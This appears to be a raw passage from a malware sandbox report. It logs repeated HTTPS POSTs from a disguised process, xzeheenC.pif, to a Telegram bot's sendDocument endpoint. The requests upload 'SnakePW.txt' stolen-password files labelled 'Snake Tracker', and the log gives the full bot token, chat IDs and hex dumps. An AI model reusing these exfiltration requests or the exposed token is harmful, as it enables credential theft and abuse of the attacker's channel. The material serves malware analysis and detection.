                                                                                                                      Data Ascii: --------------------------8dd271102821989Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:38 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418985,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535118,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      90192.168.2.550072149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:39 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23ee6cc60601
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:39 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 65 65 36 63 63 36 30 36 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd23ee6cc60601Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:40 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:39 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418988,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535119,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      91192.168.2.550073149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:39 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd241d958a93e9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:39 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 31 64 39 35 38 61 39 33 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd241d958a93e9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:40 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:40 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418990,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535120,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      92192.168.2.550074149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:39 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2799595f15e7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:39 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 39 39 35 39 35 66 31 35 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2799595f15e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:40 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:40 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418991,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535120,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      93192.168.2.550080149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:41 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2461846d9172
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:41 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 36 31 38 34 36 64 39 31 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2461846d9172Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:41 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:41 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:41 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418994,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535121,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      94192.168.2.550081149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:41 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2480fc2e3ffd
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:41 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 38 30 66 63 32 65 33 66 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2480fc2e3ffdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:42 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:42 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:42 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418996,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535122,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      95192.168.2.550082149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:41 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2813e0605d29
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:41 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 38 31 33 65 30 36 30 35 64 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2813e0605d29Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:42 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:42 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:42 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418997,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535122,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      96192.168.2.550087149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:43 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd24f1d8f190ea
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
